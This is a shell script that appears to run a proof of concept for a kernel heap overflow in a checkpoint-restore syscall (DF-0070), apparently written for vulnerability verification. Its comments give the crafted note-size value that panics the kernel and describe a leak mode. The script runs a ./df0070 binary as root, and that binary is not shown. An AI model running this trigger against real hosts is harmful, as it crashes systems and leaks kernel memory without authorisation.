#!/bin/sh
# DF-0070 PoC run -- exact run invocation used during verification.
#
# Default (panic) mode: builds evil.ckpt and calls sys_checkpoint(CKPT_THAW)
# on it; the crafted n_namesz=0x10000000 drives elf_getnote's bcopy 256 MB
# past the kmalloc(880) note buffer, hitting unmapped KVM -> kernel panic
# (Fatal trap 12 page fault in memmove/bcopy).  Default ckptgroup=0 makes
# this wheel-only, so run as root.
#
# Optional "leak" mode (slab-adjacent 116-byte OOB; usually silent EINVAL):
#   ./run.sh leak
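# Abort on the first failing command, so RUN_OK below is only reached when
# every step (including ./df0070 itself) exited 0.
set -e

# Work from the directory that holds this script, where ./df0070 is expected.
# CDPATH is cleared for this one command: with a relative "$0" (for example
# `sh poc/run.sh`) an inherited CDPATH entry could otherwise send cd to a
# different directory, and the next step executes ./df0070 from wherever cd
# lands -- as root, per the header.  `--` keeps a path that begins with '-'
# from being parsed as an option.
CDPATH= cd -- "$(dirname -- "$0")"

# First argument selects the mode; it defaults to "panic".  The header
# documents "panic" and "leak"; the value is handed to ./df0070 unchanged.
MODE="${1:-panic}"

# Trace the exact invocation.  printf '%s\n' is used instead of echo so the
# line is printed literally even if MODE contains backslashes.
printf '%s\n' "+ ./df0070 evil.ckpt $MODE"
./df0070 evil.ckpt "$MODE"

# Completion marker for whoever is collecting the run log.  Per the header, in
# the default mode a vulnerable kernel panics during the call above, so this
# line appearing means ./df0070 returned 0 and the host is still up.
printf '%s\n' "RUN_OK"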
